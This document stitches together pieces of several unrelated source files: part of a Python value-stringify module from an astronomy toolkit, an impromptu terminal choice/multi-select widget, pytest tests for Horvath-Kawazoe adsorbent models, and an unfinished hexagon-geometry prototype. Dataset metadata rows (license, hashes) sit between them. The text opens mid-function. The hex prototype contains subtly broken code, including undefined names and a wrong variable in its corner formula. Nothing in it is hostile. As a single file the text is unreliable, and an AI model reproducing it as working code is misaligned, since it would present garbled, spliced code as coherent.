#if ptype == "integer" or ptype == "real" or ptype == "boolean": vstring_with_quotes = vstring
#elif quote_value and key not in no_quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
#else: vstring_with_quotes = vstring
# DON't QUOTE THESE
if ptype == "integer" or ptype == "real" or ptype == "boolean": vstring_with_quotes = vstring
# Quote values
elif quote_value:
# Don't quote after all
if key in no_quote_value_for_keys: vstring_with_quotes = vstring
# Just quote
else: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote values
else:
# DO quote after all
if key in quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote
else: vstring_with_quotes = vstring
# Determine line
string = kstring_with_quotes + identity_symbol + vstring_with_quotes
# Add line
parts.append(string)
from ..basics.configuration import parent_type
from ..basics.log import log
keytypes = list(keytypes)
ptypes = list(ptypes)
# Investigate the different keytypes
parent_key_types = [parent_type(type_name) for type_name in keytypes]
#print("Parent key types:", parent_key_types)
# Check
for i in range(len(parent_key_types)):
if parent_key_types[i] is None: log.warning("Could not determine the parent type for '" + keytypes[i] + "'. All parent types: " + str(parent_key_types))
    if sequences.all_equal(parent_key_types) and parent_key_types[0] is not None: keytype = parent_key_types[0]
elif keytype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_key_types)[1] + "'")
# Investigate the different value types
parent_value_types = [parent_type(type_name) for type_name in ptypes]
# Check
for i in range(len(parent_value_types)):
if parent_value_types[i] is None: log.warning("Could not determine the parent type for '" + ptypes[i] + "'. All parent types: " + str(parent_value_types))
#print("Parent value types:", parent_value_types)
if sequences.all_equal(parent_value_types) and parent_value_types[0] is not None: ptype = parent_value_types[0]
elif ptype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_value_types)[1] + "'")
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
return keytype + "_" + ptype + "_dictionary", delimiter.join(parts)
# -----------------------------------------------------------------
def stringify_array(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
ptype, val = stringify_not_list(value[0], **kwargs)
if ptype is None: return "array", delimiter.join([repr(el) for el in value])
else: return ptype + "_array", delimiter.join([repr(el) for el in value])
#ptype, val = stringify_not_list(value[0])
#return ptype + "_array", ",".join([repr(el) for el in value])
# -----------------------------------------------------------------
def stringify_tuple(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
value_kwargs = copy.copy(kwargs)
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
#print("kwargs", kwargs)
strings = []
ptype = None
for entry in value:
#parsetype, val = stringify_not_list(entry, **kwargs)
parsetype, val = stringify(entry, **kwargs)
if ptype is None:
ptype = parsetype
elif ptype != parsetype:
#raise ValueError("Nonuniform tuple")
warnings.warn("Nonuniform tuple")
ptype = "mixed"
strings.append(val)
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
if ptype is not None: return ptype + "_tuple", delimiter.join(strings)
else: return "tuple", delimiter.join(strings)
# -----------------------------------------------------------------
def stringify_not_list(value, **kwargs):
"""
This function does stringify, but not for iterables
:param value:
:param kwargs:
:return:
"""
# Standard
if types.is_boolean_type(value): return "boolean", str_from_bool(value, **kwargs)
elif types.is_integer_type(value): return "integer", str_from_integer(value, **kwargs)
elif types.is_real_type(value): return "real", str_from_real(value, **kwargs)
elif types.is_string_type(value): return "string", value
elif types.is_none(value): return "None", kwargs.pop("none_string", "None")
# Unit, quantity, angle
elif introspection.lazy_isinstance(value, "UnitBase", "astropy.units"): return introspection.lazy_call("stringify_unit", "pts.core.units.stringify", value, **kwargs)
elif introspection.lazy_isinstance(value, "Quantity", "astropy.units"): return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", value, **kwargs)
elif introspection.lazy_isinstance(value, "Angle", "astropy.coordinates"): return "angle", str_from_angle(value, **kwargs)
# Range
elif introspection.lazy_isinstance(value, "RealRange", "pts.core.basics.range"): return "real_range", str_from_real_range(value, **kwargs)
elif introspection.lazy_isinstance(value, "IntegerRange", "pts.core.basics.range"): return "integer_range", str_from_integer_range(value, **kwargs)
elif introspection.lazy_isinstance(value, "QuantityRange", "pts.core.basics.range"): return "quantity_range", introspection.lazy_call("str_from_quantity_range", "pts.core.units.stringify", value, **kwargs)
# Coordinates
elif introspection.lazy_isinstance(value, "SkyCoordinate", "pts.magic.basics.coordinate"): return "skycoordinate", str_from_coordinate(value, **kwargs)
elif introspection.lazy_isinstance(value, "PixelCoordinate", "pts.magic.basics.coordinate"): return "pixelcoordinate", str_from_pixelcoordinate(value, **kwargs)
elif introspection.lazy_isinstance(value, "PhysicalCoordinate", "pts.magic.basics.coordinate"): return "physicalcoordinate", str_from_physicalcoordinate(value, **kwargs)
# Stretch
#elif introspection.lazy_isinstance(value, "SkyStretch", "pts.magic.basics.stretch"): return "skystretch", str_from_stretch(value, **kwargs)
# Extents
elif introspection.lazy_isinstance(value, "SkyExtent", "pts.magic.basics.stretch"): return "sky_extent", str_from_angle_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "PhysicalExtent", "pts.magic.basics.stretch"): return "physical_extent", str_from_quantity_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "IntegerExtent", "pts.magic.basics.vector"): return "integer_extent", str_from_integer_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "RealExtent", "pts.magic.basics.vector"): return "real_extent", str_from_real_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "AngleExtent", "pts.magic.basics.vector"): return "angle_extent", str_from_angle_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "QuantityExtent", "pts.magic.basics.vector"): return "quantity_extent", str_from_quantity_extent(value, **kwargs)
# Filter
elif introspection.lazy_isinstance(value, "Filter", "pts.core.filter.filter"): return introspection.lazy_call("stringify_filter", "pts.core.filter.filter", value, **kwargs)
# Pixelscale
elif introspection.lazy_isinstance(value, "Pixelscale", "pts.magic.basics.pixelscale"): return "pixelscale", str(value)
# Parallelization
elif introspection.lazy_isinstance(value, "Parallelization", "pts.core.simulation.parallelization"): return "parallelization", introspection.lazy_call("represent_parallelization", "pts.core.simulation.parallelization", value)
# Host
elif introspection.lazy_isinstance(value, "Host", "pts.core.remote.host"): return "host", str_from_host(value)
# Unrecognized
else:
warnings.warn("Unrecognized type: " + str(type(value)))
return None, str(value)
# -----------------------------------------------------------------
def str_from_host(host):
"""
This function ...
:param host:
:return:
"""
if host.cluster_name is not None: return host.id + ":" + host.cluster_name
else: return host.id
# -----------------------------------------------------------------
def str_from_dictionary(dictionary, **kwargs):
"""
This function ...
:param dictionary:
:param kwargs:
:return:
"""
parts = []
for key in dictionary:
value = dictionary[key]
vtype, vstring = stringify(value, **kwargs)
string = key + ": " + vstring
parts.append(string)
return ",".join(parts)
# -----------------------------------------------------------------
def stringify_string_fancy(string, **kwargs):
"""
This function ...
:param string:
:return:
"""
width = kwargs.pop("width", 100)
lines_prefix = kwargs.pop("lines_prefix", "")
from textwrap import wrap
return "string", lines_prefix + ("\n" + lines_prefix).join(wrap(string, width))
# -----------------------------------------------------------------
def stringify_list_fancy(lst, **kwargs):
"""
This function ...
:param lst:
:param kwargs:
:return:
"""
width = kwargs.pop("width", 100)
delimiter = kwargs.pop("delimiter", ", ")
lines_prefix = kwargs.pop("lines_prefix", "")
colour = kwargs.pop("colour", None)
colour_indices = kwargs.pop("colour_indices", None) # colour only certain indices
from textwrap import wrap
ptype, string = stringify(lst)
if colour is not None:
from .formatting import get_color_code, reset
code = get_color_code(colour)
if colour_indices is not None:
parts = string.split(",")
new_parts = []
for index, part in enumerate(parts):
if index in colour_indices: new_part = code + part + reset
else: new_part = part
new_parts.append(new_part)
string = ",".join(new_parts)
else: string = code + string + reset
return ptype, lines_prefix + ("\n" + lines_prefix).join(wrap(string.replace(",", delimiter), width))
# -----------------------------------------------------------------
def get_list_string_max_nvalues(lst, nvalues, **kwargs):
"""
This function ...
:param lst:
:param values:
:param kwargs:
:return:
"""
# Define string
ellipsis = ", ... , "
# Get options
delimiter = kwargs.pop("delimiter", ", ")
# Get strings
strings = get_strings(lst)
# Return
if len(lst) <= nvalues: return delimiter.join(strings)
# Add ellipses
else:
if nvalues % 2 == 0: nbegin = nend = int(0.5 * nvalues)
else:
nbegin = int(0.5 * nvalues)
nend = nvalues - nbegin
# Create string, return
return delimiter.join(strings[:nbegin]) + ellipsis + delimiter.join(strings[-nend:])
# -----------------------------------------------------------------
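# Example (sketch): get_list_string_max_nvalues([0,1,2,3,4,5,6,7,8,9], 4)
# keeps the two leading and two trailing values -> "0, 1, ... , 8, 9".
# -----------------------------------------------------------------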
def stringify_paths(paths, **kwargs):
"""
This function ...
:param paths:
:param kwargs:
:return:
"""
# Get options
    base = kwargs.pop("base", None)
if base is None: return "path_list", stringify_list(paths)[1]
else:
from . import filesystem as fs
absolute_base = fs.absolute_path(base)
# Return the type and the relative paths as a string list
return "string_list", stringify_list([fs.absolute_path(path).split(absolute_base)[1] for path in paths])[1]
# -----------------------------------------------------------------
def str_from_integer(integer, **kwargs):
"""
This function ...
:param integer:
:param kwargs:
:return:
"""
# Get settings
scientific = kwargs.pop("scientific", False)
decimal_places = kwargs.pop("decimal_places", None)
fancy = kwargs.pop("fancy", False)
ndigits = kwargs.pop("ndigits", None)
unicode = kwargs.pop("unicode", False)
html = kwargs.pop("html", False)
# Check input
if ndigits is not None and ndigits < 1: raise ValueError("Number of digits cannot be smaller than 1")
if ndigits is not None and decimal_places is not None: raise ValueError("Cannot specify both number of decimal places and number of digits")
# Set ndigits and number of decimal places
if ndigits is not None:
if scientific: decimal_places = ndigits - 1
else: pass
elif decimal_places is not None:
if scientific: ndigits = decimal_places + 1
else: pass
else: decimal_places = 2 # default value for when ndigits is not specified
#print(scientific, decimal_places, ndigits)
# Scientific notation
if scientific:
if fancy:
if ndigits is not None:
power = len(str(integer)) - 1
digits = []
str_rounded = str(integer)
for i in range(ndigits):
digit = str_rounded[i]
digits.append(digit)
if html: return digits[0] + "." + "".join(digits[1:]) + " × 10<sup>" + str(power) + "</sup>"
elif unicode: return digits[0].decode("utf8") + u"." + u"".join(digits[1:]) + u" " + strings.multiplication + u" 10" + strings.superscript(power) # DOESN'T WORK??
else: return digits[0] + "." + "".join(digits[1:]) + " x 10^" + str(power)
else:
result = "{:.0e}".format(integer).replace("+", "").replace("e0", "e")
power = int(result.split("e")[1])
if html: result = result.split("e")[0] + " × 10<sup>" + str(power) + "</sup>"
elif unicode: result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power) # DOESN'T WORK
else: result = result.split("e")[0] + " x 10^" + str(power)
return result
else:
if ndigits is not None: decimal_places = ndigits - 1
if html: return ("{:." + str(decimal_places) + "e}").format(float(integer)).replace("+", "").replace("e0", " × 10<sup>") + "</sup>"
else: return ("{:." + str(decimal_places) + "e}").format(float(integer)).replace("+", "").replace("e0", "e")
# Not scientific
else: return str(integer)
# -----------------------------------------------------------------
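# Example outputs of str_from_integer (sketch):
#   str_from_integer(1234)                  -> "1234"
#   str_from_integer(1234, scientific=True) -> "1.23e3"
#   str_from_integer(1234, scientific=True, fancy=True, ndigits=2)
#                                           -> "1.2 x 10^3"
# -----------------------------------------------------------------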
#def str_from_integer_range(the_range, scientific=False, decimal_places=2, fancy=False, ndigits=None, unicode=False, **kwargs):
def str_from_integer_range(the_range, **kwargs):
"""
    This function ...
:param the_range:
:param kwargs:
:return:
"""
min_str = str_from_integer(the_range.min, **kwargs)
max_str = str_from_integer(the_range.max, **kwargs)
return min_str + " > " + max_str
# -----------------------------------------------------------------
def str_from_real(real, **kwargs):
"""
This function ...
:param real:
:param kwargs:
:return:
"""
# Get kwargs
scientific = kwargs.pop("scientific", False)
decimal_places = kwargs.pop("decimal_places", None)
fancy = kwargs.pop("fancy", False)
ndigits = kwargs.pop("ndigits", None)
unicode = kwargs.pop("unicode", False)
doround = kwargs.pop("round", False)
html = kwargs.pop("html", False)
#print(decimal_places, ndigits)
# Check input
if ndigits is not None and ndigits < 1: raise ValueError("Number of digits cannot be smaller than 1")
if ndigits is not None and decimal_places is not None: raise ValueError("Cannot specify both number of decimal places and number of digits")
# Set ndigits and number of decimal places
if ndigits is not None:
if scientific: decimal_places = ndigits - 1
else: pass
elif decimal_places is not None:
if scientific: ndigits = decimal_places + 1
else: pass
else: decimal_places = 2 # default value for when ndigits is not specified
#print(decimal_places, ndigits)
# Scientific notation
if scientific:
# Fancy
if fancy:
if ndigits is not None:
if "e" in str(real): power = int(str(real).split("e")[1])
else: power = len(str(real).split(".")[0]) - 1
digits = []
rounded = numbers.round_to_n_significant_digits(real, ndigits)
str_rounded = str(rounded)
#print(str_rounded)
#if "." in str_rounded: enditeration = ndigits + 1
#else: enditeration = ndigits
if "." in str_rounded: str_rounded = "".join(str_rounded.split("."))
for i in range(ndigits):
digit = str_rounded[i]
#if digit == ".": continue # happens if rounded does stil contain dot
digits.append(digit)
#print("digits", digits)
if html: return digits[0] + "." + "".join(digits[1:]) + " × 10<sup>" + str(power) + "</sup>"
elif unicode: return digits[0].decode("utf8") + u"." + u"".join(digits[1:]) + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8") # DOESN'T WORK??
else: return digits[0] + "." + "".join(digits[1:]) + " x 10^" + str(power)
else:
result = ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", "e")
power = int(result.split("e")[1])
#result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8")
#result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8")
if html: result = result.split("e")[0] + " × 10<sup>" + str(power) + "</sup>"
elif unicode: result = result.split("e")[0].decode("utf8") + u" " + u"x" + u" 10" + strings.superscript(power).decode("utf8") # SOMETHING LIKE THIS?? DOESN'T WORK??
else: result = result.split("e")[0] + " x 10^" + str(power)
return result
else:
if ndigits is not None: decimal_places = ndigits - 1
if html: return ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", " × 10<sup>") + "</sup>"
else: return ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", "e")
else:
if doround:
#numbers.order_of_magnitude()
if ndigits is not None: return repr(numbers.round_to_n_significant_digits(real, ndigits))
else:
primary_ndigits = numbers.order_of_magnitude(real) + 1
ndigits = decimal_places + primary_ndigits
if ndigits < 1:
warnings.warn("The small number '" + repr(real) + "' cannot be represented with only " + str(decimal_places) + " decimal places: using scientific notation")
return str_from_real(real, scientific=True, ndigits=decimal_places+1)
else:
#print(decimal_places, primary_ndigits, ndigits)
return ("{:." + str(ndigits) + "}").format(real)
else: return repr(real)
# -----------------------------------------------------------------
#def str_from_real_range(the_range, scientific=False, decimal_places=2, fancy=False, ndigits=None, unicode=False, **kwargs):
def str_from_real_range(the_range, **kwargs):
"""
This function ...
:param the_range:
:param kwargs:
:return:
"""
min_str = str_from_real(the_range.min, **kwargs)
max_str = str_from_real(the_range.max, **kwargs)
return min_str + " > " + max_str
# -----------------------------------------------------------------
def str_from_coordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.ra, **kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.dec, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_pixelcoordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return repr(coordinate.x) + delimiter + repr(coordinate.y)
# -----------------------------------------------------------------
def str_from_physicalcoordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.x, **kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.y, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_stretch(stretch, **kwargs):
"""
This function ...
:param stretch:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", stretch.ra,
**kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity",
"pts.core.units.stringify",
stretch.dec, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_angle_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_angle(extent.x, **kwargs) + delimiter + str_from_angle(extent.y, **kwargs)
# -----------------------------------------------------------------
def str_from_quantity_extent(extent, **kwargs):
"""
    This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", extent.x, **kwargs)[1] + delimiter + \
introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", extent.y, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_integer_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_integer(extent.x, **kwargs) + delimiter + str_from_integer(extent.y, **kwargs)
# -----------------------------------------------------------------
def str_from_real_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_real(extent.x, **kwargs) + delimiter + str_from_real(extent.y, **kwargs)
# -----------------------------------------------------------------
def yes_or_no(boolean, **kwargs):
"""
This function ...
:param boolean:
:param kwargs:
:return:
"""
# Get options
short = kwargs.pop("short", False)
answer = "yes" if boolean else "no"
if short: return answer[0]
else: return answer
# -----------------------------------------------------------------
def str_from_bool(boolean, **kwargs):
"""
This function ...
:param boolean:
:param kwargs:
:return:
"""
# Get options
lower = kwargs.pop("lower", False)
if lower: return str(boolean).lower()
else: return str(boolean)
# -----------------------------------------------------------------
def str_from_angle(angle, **kwargs):
"""
This function ...
:param angle:
:param kwargs:
:return:
"""
return str_from_real(angle.value, **kwargs) + " " + str(angle.unit).replace(" ", "")
# -----------------------------------------------------------------
| agpl-3.0 | -4,237,823,556,950,689,000 | 32.980198 | 229 | 0.577846 | false |
imdaveho/impromptu | impromptu/fields/_choices.py | 1 | 11268 | from platform import system
from ._base import Question
class ChoiceSelect(Question):
def __init__(self, name, query, choices=None, size=7,
default="", color=None, colormap=None):
super().__init__(name, query, default, color, colormap)
self._keys_in_use = [
"Enter", "ArrowUp", "ArrowDown"
]
self.widget = "choice"
self.size = size
self.choice_index = 0
self.cursor_index = 0
if choices is None:
self.choices = []
self.BOTTOM = 0
else:
self.choices = choices
self.BOTTOM = len(choices) - 1
        self.overflow = len(self.choices) <= size  # True when all choices fit in the widget
self.PADDING = 0 if self.overflow else size // 2
cursor_colormap = [(0, 0, 0), (7, 0, 0), (0, 0, 0), (0, 0, 0)]
self.config["cursor"] = (" › ", cursor_colormap)
self.config["active"] = (7, 0, 0)
self.config["inactive"] = (0, 0, 0)
def _set_config(self, n, c):
default = self.config[n]
return {
"icon": (*c, default) if type(c) is tuple else (c, default),
"cursor": (*c, default) if type(c) is tuple else (c, default),
"active": (c, default),
"inactive": (c, default),
"linespace": (c, default),
"result": (c, default),
"refresh": (c, default),
}.get(n, None)
def setup(self, icon=False, cursor=False, active=False, inactive=False,
linespace=False, result=False, refresh=False):
kwargs = {
"icon": icon,
"cursor": cursor,
"active": active,
"inactive": inactive,
"linespace": linespace,
"result": result,
"refresh": refresh,
}
super().setup(**kwargs)
def _segment_choices(self):
segment = []
length = len(self.choices)
if (length <= self.size):
segment = self.choices
else:
start = self.choice_index - self.cursor_index
finish = self.size + start
segment = self.choices[start:finish]
return segment
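
    # Worked example (illustrative): with 10 choices, size=7 and PADDING=3,
    # once choice_index=5 and cursor_index=3 the window starts at 5 - 3 = 2
    # and shows choices[2:9]; the highlighted row stays pinned near the
    # middle while the list scrolls beneath it.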
def _prepare_choices(self):
active = self.config["active"]
inactive = self.config["inactive"]
segment = self._segment_choices()
choices = [(c, [inactive for _ in c]) for c in segment]
cursor, cursor_cm = self.config["cursor"]
blanks = ''.join([" " for _ in cursor])
blanks_cm = [inactive for _ in cursor_cm]
render_list = []
for i, c in enumerate(choices):
render = None
choice, choice_cm = c
if i == self.cursor_index:
choice_cm = [active for _ in choice]
render = (cursor + choice, cursor_cm + choice_cm)
else:
render = (blanks + choice, blanks_cm + choice_cm)
render_list.append(render)
return render_list
def _draw_widget(self):
x, y = 0, self.linenum + 1
renderable = self._prepare_choices()
for choice in renderable:
c, cm = choice
for ch, colors in zip(c, cm):
fg, attr, bg = colors
self.cli.set_cell(x, y, ch, fg | attr, bg)
x += 1
y += 1
x = 0
return None
def _clear_widget(self):
w, h = self.cli.size()
h = self.size
for i in range(h):
y = i + self.linenum + 1
for x in range(w):
self.cli.set_cell(x, y, " ", 0, 0)
return None
def redraw_all(self):
self._clear_widget()
self._draw_widget()
self.cli.hide_cursor()
self.cli.flush()
def reset(self):
super().reset()
self.choice_index = 0
self.cursor_index = 0
def _main(self):
super()._main()
self.result = self.choices[self.choice_index]
return None
def _handle_events(self):
evt = self.pull_events()[0]
if evt["Type"] == self.cli.event("Key"):
k = evt["Key"]
if k == self.cli.key("Enter"):
self.end_signal = True
elif k == self.cli.key("ArrowUp"):
if self.cursor_index > self.PADDING:
self.cursor_index -= 1
self.choice_index -= 1
elif self.choice_index > self.PADDING:
self.choice_index -= 1
elif self.choice_index <= self.PADDING:
if self.choice_index > 0:
self.choice_index -= 1
self.cursor_index -= 1
else:
self.cursor_index = 0
elif k == self.cli.key("ArrowDown"):
if self.cursor_index < self.PADDING:
self.cursor_index += 1
self.choice_index += 1
elif self.choice_index < self.BOTTOM - self.PADDING:
if self.overflow:
self.cursor_index += 1
                    self.choice_index += 1
elif self.choice_index >= self.BOTTOM - self.PADDING:
if self.choice_index < self.BOTTOM:
self.choice_index += 1
self.cursor_index += 1
else:
self.choice_index = self.BOTTOM
else:
pass
elif evt["Type"] == self.cli.event("Error"):
# EventError
raise(Exception(evt["Err"]))
return None
class MultiSelect(ChoiceSelect):
def __init__(self, name, query, choices=None, size=7,
default="", color=None, colormap=None):
super().__init__(name, query, choices, size, default, color, colormap)
self._keys_in_use = [
"Enter", "ArrowLeft", "ArrowUp",
"ArrowRight", "ArrowDown", "Space",
]
self.widget = "multi-choice"
        self.choices = [(c, False) for c in (choices or [])]
cursor_colormap = [(0, 0, 0), (7, 0, 0), (0, 0, 0)]
self.config["cursor"] = (" › ", cursor_colormap)
self.config["selected"] = "► " if system() == "Windows" else "◉ "
self.config["unselected"] = '○ '
def _set_config(self, n, c):
default = self.config[n]
return {
"icon": (*c, default) if type(c) is tuple else (c, default),
"cursor": (*c, default) if type(c) is tuple else (c, default),
"selected": (c, default),
"unselected": (c, default),
"active": (c, default),
"inactive": (c, default),
"linespace": (c, default),
"result": (c, default),
"refresh": (c, default),
}.get(n, None)
def setup(self, icon=False, cursor=False, selected=False, unselected=False,
active=False, inactive=False, linespace=False, result=False,
refresh=False):
kwargs = {
"icon": icon,
"cursor": cursor,
"selected": selected,
"unselected": unselected,
"active": active,
"inactive": inactive,
"linespace": linespace,
"result": result,
"refresh": refresh,
}
# have to call the base Question class
# since MultiSelect extends ChoiceSelect
# and ChoiceSelect has different kwargs
# than what the MultiSelect can accept
super(ChoiceSelect, self).setup(**kwargs)
def _prepare_choices(self):
active = self.config["active"]
inactive = self.config["inactive"]
cursor, cursor_cm = self.config["cursor"]
selected = self.config["selected"]
unselected = self.config["unselected"]
choices = self._segment_choices()
blanks = ''.join([" " for _ in cursor])
# blanks_cm = [inactive for _ in blanks] # TODO: confirm usage
render_list = []
for i, c in enumerate(choices):
render = None
choice, is_checked = c
if i == self.cursor_index:
if is_checked:
text = cursor + selected + choice
else:
text = cursor + unselected + choice
colormap = [active for _ in text]
render = (text, colormap)
else:
if is_checked:
text = blanks + selected + choice
colormap = [active for _ in text]
else:
text = blanks + unselected + choice
colormap = [inactive for _ in text]
render = (text, colormap)
render_list.append(render)
return render_list
def reset(self):
super().reset()
reset_choices = []
for c, _ in self.choices:
            reset_choices.append((c, False))
self.choices = reset_choices
def _main(self):
super()._main()
self.result = [ch for ch, s in self.choices if s]
def _handle_events(self):
evt = self.pull_events()[0]
if evt["Type"] == self.cli.event("Key"):
k = evt["Key"]
if k == self.cli.key("Enter"):
self.end_signal = True
elif k == self.cli.key("ArrowUp"):
if self.cursor_index > self.PADDING:
self.cursor_index -= 1
self.choice_index -= 1
elif self.choice_index > self.PADDING:
self.choice_index -= 1
elif self.choice_index <= self.PADDING:
if self.choice_index > 0:
self.choice_index -= 1
self.cursor_index -= 1
else:
self.cursor_index = 0
elif k == self.cli.key("ArrowDown"):
if self.cursor_index < self.PADDING:
self.cursor_index += 1
self.choice_index += 1
elif self.choice_index < self.BOTTOM - self.PADDING:
if self.overflow:
self.cursor_index += 1
                    self.choice_index += 1
elif self.choice_index >= self.BOTTOM - self.PADDING:
if self.choice_index < self.BOTTOM:
self.choice_index += 1
self.cursor_index += 1
else:
self.choice_index = self.BOTTOM
elif k == self.cli.key("ArrowRight"):
choice, _ = self.choices[self.choice_index]
self.choices[self.choice_index] = (choice, True)
elif k == self.cli.key("ArrowLeft"):
choice, _ = self.choices[self.choice_index]
self.choices[self.choice_index] = (choice, False)
elif k == self.cli.key("Space"):
choice, marked = self.choices[self.choice_index]
self.choices[self.choice_index] = (choice, not marked)
else:
pass
elif evt["Type"] == self.cli.event("Error"):
# EventError
raise(Exception(evt["Err"]))
return None
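
# Hypothetical usage sketch (not part of the module; the event loop and
# terminal backend supplied by the impromptu runner are assumed):
#
#   q = MultiSelect("toppings", "Pick your toppings:",
#                   choices=["cheese", "olives", "ham"])
#   # ... run the prompt; afterwards q.result holds the chosen strings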
| mit | 5,215,955,067,594,919,000 | 36.526667 | 79 | 0.483478 | false |
pauliacomi/pyGAPS | tests/characterisation/test_hk_models.py | 1 | 1365 | """
Tests relating to Horvath-Kawazoe model validation.
All functions in /characterisation/models_hk.py are tested here.
The purposes are:
- testing that the "function getter" is performing as expected.
"""
import pytest
import pygaps.characterisation.models_hk as hk
import pygaps.utilities.exceptions as pgEx
@pytest.mark.characterisation
class TestHKModels():
"""Tests the HK models."""
def test_get_hk_model_string(self):
"""Just gets stored models."""
for model in hk._ADSORBENT_MODELS:
assert hk.get_hk_model(model) == hk._ADSORBENT_MODELS[model]
def test_get_hk_model_error(self):
"""Check if errors are raised."""
with pytest.raises(pgEx.ParameterError):
hk.get_hk_model('bad_model')
def test_get_hk_model_dict(self):
"""When passing a dict, we check for consistency and return the same dict."""
model_dict = dict(
molecular_diameter=0.276, # nm
polarizability=2.5E-3, # nm3
magnetic_susceptibility=1.3E-7, # nm3
surface_density=1.315E19, # molecules/m2
)
assert hk.get_hk_model(model_dict) == model_dict
# dictionary parameters should be checked
model_dict.pop('molecular_diameter')
with pytest.raises(pgEx.ParameterError):
hk.get_hk_model(model_dict)
| mit | 8,228,157,673,054,915,000 | 29.333333 | 85 | 0.645421 | false |
ZuraK/aVarCode | py_prototyping/hex.py | 1 | 7514 | # File:
# Desc: Hexagon grid math notes and prototype helpers.

import math
from collections import namedtuple

# Minimal coordinate types (an assumption of this cleanup) standing in for
# the Vector2Point / Hex / Cube / offset types the notes below reference.
Vector2 = namedtuple("Vector2", "x y")
Hex = namedtuple("Hex", "q r")
Cube = namedtuple("Cube", "x y z")
OffsetCoord = namedtuple("OffsetCoord", "col row")
# param: hType, hexType, 0 for Flat topped, 30 if Pointy topped
# param: center, Vector2Point, hex center
# param: radius, size of hex
# param: index, indexPoint corner of hex, 0-5
# returns: Vector2Point hex corner
def GeneratePointHEX(hType, center, radius, index):
    angle_deg = 60 * index + hType  # 0 if Flat, 30 if Pointy
    angle_rad = math.pi / 180 * angle_deg
    x = center.x + radius * math.cos(angle_rad)  # original used undefined 'size'; 'radius' is meant
    y = center.y + radius * math.sin(angle_rad)
    return Vector2(x, y)
# param: hType, hexType, 0 for Flat topped, 30 if Pointy topped
# param: center, Vector2Point, hex center
# param: radius, size of hex
# returns: Vector2[] hex corners
def GenerateVectorsHEX(hType, center, radius):
    vec = []
    for val in range(6):
        angle_deg = 60 * val + hType  # 0 if Flat, 30 if Pointy
        angle_rad = math.pi / 180 * angle_deg
        x = center.x + radius * math.cos(angle_rad)
        y = center.y + radius * math.sin(angle_rad)
        vec.append(Vector2(x, y))
    return vec
def PrintInfo():
    print("=====[[ Hexagons ]]=====")
    print("(00) Definitions, Equations")
    print("(01) Storage, Tables")
    print("(02) Generation")
    return
# HexEdges, Indices
# A 0,1;
# B 1,2;
# C 2,3;
# D 3,4;
# E 4,5;
# F 5,0;
# HexTriangles, Indices (Index 6 as Center)
# A 6,0,1;
# B 6,1,2;
# etc
# Triangle Fan -> Center(0),First(1),Second(2), ...
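
# Sketch (my addition, assuming the corner indexing above with the center
# appended as index 6): build the edge pairs and triangle-fan triples the
# notes describe.
def HexEdgeIndices():
    return [(i, (i + 1) % 6) for i in range(6)]

def HexTriangleIndices(center_index=6):
    return [(center_index, i, (i + 1) % 6) for i in range(6)]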
# Hexagon area:
# A = (3 * sqrt(3) / 2) * size^2
# Perimeter: 6 * size
# Slices 60 deg, 60 deg, 60 deg
# Total internal angles: 720 deg
# Internal angle: 120 deg
#
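# Direct translation of the formulas above (size = circumradius):
def HexArea(size):
    return (3.0 * math.sqrt(3.0) / 2.0) * size * size

def HexPerimeter(size):
    return 6.0 * size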
# dirs:
#   flat
